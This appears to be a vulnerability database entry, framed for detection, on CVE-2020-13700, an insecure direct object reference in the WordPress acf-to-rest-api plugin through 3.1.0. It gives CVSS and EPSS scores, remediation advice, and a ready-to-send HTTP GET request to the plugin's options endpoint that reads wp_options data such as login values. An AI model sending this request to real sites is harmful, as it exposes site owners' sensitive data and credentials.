🔙 목록으로 돌아가기

CVE-2020-13700: WordPress acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference

TitleWordPress acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference
Authorpikpikcu
SeverityHigh
ImpactAn attacker can exploit this vulnerability to access sensitive data, such as user information or administrative credentials.
RemediationUpdate the acf-to-rest-api plugin to version >3.1.0 or apply the latest security patches.
CVSS Score7.5
EPSS Score0.93725
CVE IDCVE-2020-13700
CWE IDCWE-639
Tags cve cve2020 wordpress plugin acf_to_rest_api_project vuln

🔍 Vulnerability Description

WordPress acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.

🌐 HTTP Request

GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-13700.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-13700.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A